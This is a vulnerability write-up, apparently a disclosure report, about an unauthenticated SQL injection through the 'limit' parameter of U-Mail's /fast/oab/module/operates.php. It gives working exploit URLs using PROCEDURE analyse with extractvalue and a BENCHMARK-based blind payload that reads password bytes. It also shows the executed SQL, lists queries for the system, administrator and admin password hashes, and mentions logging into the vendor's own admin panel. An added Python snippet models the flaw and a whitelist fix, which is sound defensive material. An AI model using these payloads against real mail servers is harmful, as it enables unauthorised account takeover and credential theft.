MySQL LIMIT injection: U-Mail mail system injection 2 (SQL injection in the MySQL LIMIT clause, no login required, with a script to retrieve user passwords)

Last time I only searched the client directory; today I happened to search the fast directory as well and found another instance. Note: every function under the client directory requires a login before it can be executed, whereas the functions under fast can be executed without logging in (only some functions exist there, and they cannot read mail and so on). The vulnerability has the same root cause as the previous one, only in a different file; here the access check is lax, any user can reach the code, so SQL injection is possible without logging in. SLEEP() cannot be used inside the LIMIT clause, so BENCHMARK() provides the delay instead. Vulnerable file: /fast/oab/module/operates.php. Code:

if ( ACTION == "member-get" )
{
    $dept_id = gss( $_GET['dept_id'] );
    $keyword = gss( $_GET['keyword'] );
    $page = $_GET['page'] ? gss( $_GET['page'] ) : 1;
    //limit
    $limit = $_GET['limit'] ? gss( $_GET['limit'] ) : 25; // user-controlled variable
    $orderby = gss( $_GET['orderby'] );
    $is_reverse = gss( $_GET['is_reverse'] );
    $data_cache = $Department->getDepartmentByDomainID( $domain_id, "dept_id,name,parent_id,`order`", 0 );
    $department_list = create_array( $data_cache, "dept_id", "name" );
    $where = "";
    if ( $dept_id && $dept_id != "-1" )
    {
        $Tree = $Department->getTreeObject( );
        $Tree->set_data_cache( $data_cache );
        $Tree->sort_data( -1, 1 );
        $dept_ids = $Tree->get_child_id( $dept_id );
        $user_ids = $Department->getMailboxIDByDepartmentID( $dept_ids, 0 );
        $where = "t1.UserID IN (".$user_ids.")";
    }
    if ( $keyword )
    {
        if ( $where )
        {
            $where .= " AND ";
        }
        if ( strpos( $keyword, "@" ) )
        {
            $key_tmp = explode( "@", $keyword );
            $keyword = $key_tmp[0];
        }
        $where .= "(t1.FullName LIKE \"%".$keyword."%\" OR t1.Mailbox LIKE \"%".$keyword."%\")";
    }
    // orderby is mapped through a whitelist, so it is NOT injectable
    switch ( $orderby )
    {
        case "fullname" :
            $orderby = "t1.FullName";
            break;
        case "mailbox" :
            $orderby = "t1.Mailbox";
            break;
        case "sex" :
            $orderby = "t2.sex";
            break;
        case "birthday" :
            $orderby = "t2.birthday";
            break;
        case "mobile" :
            $orderby = "t2.mobil";
            break;
        case "tel" :
            $orderby = "t2.teleextension";
            break;
        case "position" :
            $orderby = "t2.headship";
            break;
        case "group_num" :
            $orderby = "t2.o_group";
            break;
        case "email" :
            $orderby = "t1.Mailbox";
            break;
        default : // the default label is missing from the decompiled listing; restored here
            $orderby = "";
    }
    // $limit goes into the function unchecked
    $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, $page, $limit, $orderby, $is_reverse, 0 );
}



$limit is user-controlled, which produces the injection. Because the LIMIT clause takes numbers, the payload needs no quote characters (the separator is written as 0x3a), so whatever escaping gss() performs cannot stop it. To exploit it, first POST data to the URL (note: this interface does not really give an arbitrary login; after that step only the handful of functions exposed here can be called, so whenever one of them has a SQL flaw the result is an unauthenticated SQL injection of that flaw. If, for example, the security question could be updated, that would yield a way to obtain any user's password. The reachable functions are limited, though, and cannot read user mail.)
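To make the sink concrete, here is an added example (my own Python model, not U-Mail code): it reproduces the shape of the query from the general log below with `limit` concatenated straight after LIMIT, and puts the check that should have been there beside it. The body of getMailboxInfo() is not on the page, so the concatenation point, the addslashes-style behaviour of gss(), and the offset = (page-1)*limit pagination in the fixed version are all assumptions.

```python
import re

# Constructed input: the exact `limit` value from the page's first exploit URL.
VULN_LIMIT = "1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)"

# Query shape copied from the general-log line on the page.
BASE_QUERY = (
    "SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* "
    "FROM userlist as t1, mailuserinfo as t2 "
    "WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 "
    "ORDER BY t1.OrderNo DESC,t1.Mailbox ASC"
)


def gss(value: str) -> str:
    """Assumed stand-in for U-Mail's gss(): addslashes-style quote escaping.
    The real implementation is not on the page; the point is that escaping
    quotes does nothing to a payload that contains none."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def build_query_vulnerable(limit: str) -> str:
    """Assumed sink inside getMailboxInfo(): the escaped string lands after
    LIMIT unchanged, which is what the logged query shows."""
    return BASE_QUERY + " LIMIT " + gss(limit)


class BadLimit(ValueError):
    """Raised when a pagination parameter is not a small positive integer."""


def parse_int_param(value: str, default: int, maximum: int) -> int:
    """Hardened form: LIMIT and OFFSET only ever take unsigned integers, so
    accept nothing else and bound them. Escaping is the wrong tool here."""
    if value == "":
        return default
    if not re.fullmatch(r"[0-9]{1,7}", value):
        raise BadLimit(f"expected a positive integer, got {value!r}")
    n = int(value)
    if n < 1 or n > maximum:
        raise BadLimit(f"value {n} out of range 1..{maximum}")
    return n


def build_query_fixed(page: str, limit: str) -> str:
    """Same query with both pagination values validated and emitted as
    integers. The offset formula is an assumption about the intended API."""
    n = parse_int_param(limit, default=25, maximum=500)
    p = parse_int_param(page, default=1, maximum=1_000_000)
    offset = (p - 1) * n
    return BASE_QUERY + f" LIMIT {offset},{n}"


def injected(sql: str) -> bool:
    """Demo check: did the attacker's clause survive into the final SQL?"""
    return "PROCEDURE analyse" in sql


if __name__ == "__main__":
    print(build_query_vulnerable(VULN_LIMIT))  # payload passes through intact
    print(build_query_fixed("3", "10"))        # LIMIT 20,10
    try:
        build_query_fixed("1", VULN_LIMIT)
    except BadLimit as e:
        print("rejected:", e)
```

The fix is deliberately a whitelist on the value's type, not a blacklist on keywords such as PROCEDURE: the LIMIT position accepts only integers, so anything else is simply an error.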

[screenshot: 3751b47a2db18f5224e600d53cc8f704.png]

After obtaining authentication, request http://**.**.**.**/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1+PROCEDURE+analyse(extractvalue(rand(),concat(0x3a,version())),1) and the result is as follows. (If the database error were echoed, extractvalue() would fail with an "XPATH syntax error" whose message contains the concat()'d string, i.e. the server version. Note that PROCEDURE ANALYSE() was deprecated in MySQL 5.7.18 and removed in MySQL 8.0, so this vector only applies to older servers.)

[screenshot: 20cb32f3196f6ab3570646b2cedf44d4.png]

The SQL it executed (from the MySQL general log) was:

150128 21:44:43  3142 Connect  [email protected] on
                 3142 Query    SET NAMES 'UTF8'
                 3142 Init DB  umail
                 3142 Query    SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
                 3142 Query    SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
                               FROM userlist as t1, mailuserinfo as t2
                               WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
                               ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
                 3142 Query    SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
                               FROM userlist as t1, mailuserinfo as t2
                               WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
                               ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)
                 3142 Quit


[screenshot: 6f0af545e9822070749f883416a75374.png]

Because the error text is not echoed back, we fall back to a blind, time-based injection. The request is http://**.**.**.**/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1) : when the first byte of the password equals 97 ('a') the server spends several seconds in BENCHMARK() before answering, otherwise it answers at once. The delay depends on the server's CPU, so calibrate the threshold with a known-true and a known-false condition before trusting the timings.

[screenshot: b9c6eca6a65bc5bac30b5af11f25c7c7.png]

The SQL executed was:

150128 21:47:16  3144 Connect  [email protected] on
                 3144 Query    SET NAMES 'UTF8'
                 3144 Init DB  umail
                 3144 Query    SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
                 3144 Query    SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
                               FROM userlist as t1, mailuserinfo as t2
                               WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
                               ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
                 3144 Query    SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
                               FROM userlist as t1, mailuserinfo as t2
                               WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0
                               ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)


The injection works, so a script can enumerate each account and password. For the administrator accounts:
select password from userlist where userid=2 (the "system" user)
select password from web_usr where usr_code=1 (the "administrator" user)
select password from web_usr where usr_code=2 (the "admin" user)
For ordinary users, iterate over userid and read username and password. Attached is the blind-injection script (only half written; it does not use binary search and the like, but it does the job). Local test:

[screenshot: c5f7206348d5923681c47733e3f277c4.png]

And screenshots of the admin login on the vendor's own site:

[screenshot: f359d7d9385d4fbb099bbb4422ff61ae.png]

[screenshot: 04de578e72ff0ba13b4ed7cf5962e4fd.png]
